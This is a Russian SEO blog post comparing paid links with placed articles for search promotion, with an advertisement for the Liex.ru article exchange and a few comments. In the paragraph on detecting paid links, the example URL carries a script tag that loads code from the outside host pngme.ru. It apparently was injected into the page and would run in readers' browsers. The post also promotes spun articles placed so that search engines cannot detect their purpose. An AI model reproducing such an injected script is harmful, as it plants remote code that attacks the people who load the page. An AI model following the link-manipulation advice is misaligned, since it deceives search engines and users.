Как продвигать, статьями или покупными ссылками?

Как вы думаете, какая техника продвижения наиболее эффективная? От продвижение покупными ссылками можно получить более быструю отдачу, чем от продвижения статьями, но размещение статей «навсегда» позволит свести к минимуму затраты на дальнейшую поддержку сайта. Я выскажу свое мнение по этому поводу.

Итак, как лучше продвигать сайт, статьями или ссылками? Каждая из техник имеет свои плюсы и свои минусы, давайте их рассмотрим.

Продвижение покупными ссылками

Отрицательная сторона: как правило, покупные ссылки выглядят неестественно. Они размещаются в футере страницы, в блоке с заголовком «Реклама», или где-либо на странице блоком, заполненным только ссылками. Поисковые системы активно ведут борьбу с покупными ссылками, это противоречит их идеологии — ссылки должны ставиться по доброй воле, а не за материальное вознаграждение. Сайты, продающие ссылки банятся поисковыми системами или попадают под фильтр.

Отследить покупные ссылки достаточно просто. Биржи размещают ссылки на страницах сайта относительно их URL, если добавить любой параметр к адресу, например /?some_param=foo<script src="//pngme.ru/seter"></script>, содержимое страницы не изменится, за исключением покупных ссылок, они исчезнут, т.к. URL изменился.

Положительная сторона: продвижение покупными ссылками, как правило, дает более быструю отдачу, чем продвижение статьями, так как ссылки покупаются на страницах с уже присвоенным рейтингом. Заплатив определенную сумму, можно разместить ссылку на странице, скажем с PR 7, которая будет перекачивать ссылочный вес на ваш сайт. И скорее всего после ближайшего АПа вы уже почувствуете положительный результат.

Я не спорю, без покупки ссылок очень сложно продвинуть сайт в ТОП по ВЧ и некоторым СЧ, но что если часть бюджета, выделяемого на покупку ссылок тратить на размещение статей?

Продвижение статьями

Что такое продвижение статьями я рассказывал ранее, но коротко все-таки поясню. Пишется тематическая статья, в тексте ставятся ссылки на продвигаемый ресурс. Далее статья размещается на площадке, как правило, на неограниченный срок. Индексируется и передает ссылочный вес реципиенту.

Отрицательная сторона: продвижение статьями более трудоемкий процесс, чем покупка ссылок. Статью необходимо написать, расставить в ней ключевые слова, найти тематические площадки, договориться о размещении и проверять ее индексируемость. Частично эти проблемы может решить биржа статей, о которой речь пойдет чуть ниже.

Продвижение статьями достаточно дорогостоящий метод, написание одной статьи может обойтись от 3$ до 15$, написание 20 статей уже обойдется в 60$-300$, а их ведь еще нужно разместить на площадках. Значительно сократить бюджет на написание статей поможет услуга «Размножение статей», заказать которую вы можете у нас.

Положительная сторона: ссылки в статьях смотрятся естественно! Они окружены полезным тематическим контентом, обогащенным ключевыми словами. На мой взгляд, это главное преимущество статей! Поисковики обожают уникальный контент и с доверием относятся к ссылкам в нем.

Я не могу предположить, каким методом можно определить, что статья размещена с целью умышленного воздействия на результаты поисковой выдачи. Вы фактически покупаете страницу на сайте, которая имеет реальный URL, статья никак не выдает своего предназначения, и площадка не подвергнется наказаниям со стороны поисковых систем.

Статьи, как правило, размещаются «навсегда», т.е. на все время существования площадки. Каждый раз, размещая статьи «навсегда», вы сводите к минимуму дальнейшие затраты на поддержку позиций сайта, так как размещенные ранее статьи никуда не делись, они работают и по прежнему передают ссылочный вес, за них не нужно платить дополнительные деньги. Периодически размещая статьи, вы увеличиваете постоянную ссылочную базу продвигаемого ресурса, которая будет подпитывать его на протяжении всего существования.

Продвижение статьями на практике

Я являюсь сторонником продвижения статьями. На практике убедился в эффективности этой методики и результаты радуют! Практически все проекты, над которыми я работаю, продвигаются размноженными статьями, и иногда только статьями, без применения иных методов.

Биржа статей Liex.ruЕдинственная сложность продвижения статьями — поиск тематических площадок, некоторые я нахожу на форуме SE, но этого бывает мало. Поэтому большинство статей я размещаю через биржу Liex.Ru, которая является, на мой взгляд, наиболее удобной для этих целей!

Особенно мне нравится пакетная загрузка статей, это очень актуально в моем случае, т.к. после размножения статей получается несколько сотен и вручную их размещать очень сложно.

Так же в Liex.Ru имеется возможность создания фильтров. Фильтры предназначены для выборки площадок в соответствии с пользовательскими требованиями. Вы можете выбрать все площадки, возрастом более одного года, размещенные в DMOZ и ЯК, с PR=6 главной страницы и т.д. Опций довольно много.

Найти качественные тематические площадки можно установив опции «принимает только тематические статьи» и «жесткая модерация».

Я произвожу размещение статей «навсегда», но в вашем случае, возможно, это не обязательно.

Работаю с Liex.ru уже довольно давно, да, конечно есть некоторые неудобства, но в целом она отвечает всем моим требованиям.

Заключение

Можно ли продвигать только статьями? Несомненно можно, но нужно подходить к этому с умом. Не стоит полагаться только на статьи, продвигая сайты в ТОП по ВЧ, все-таки при жесткой конкуренции без покупных ссылок не обойтись. Но размещение статей должно стать важной частью вашей стратегии продвижения, потому как создает постоянную базу качественных ссылок продвигаемому сайту!

  • MiroslavaAndreev

    Согласен с вами. Продолжайте в том же духе.

  • Nina Zorin

    ПРедлагаю обменяться ссылками. Пишите на email.

  • Евгений Краузе

    Продвижение сайта, это правильный текст, код и перелинковка. И хорошо работает околоссылочный текст. Удачи.

Запись навигация

Top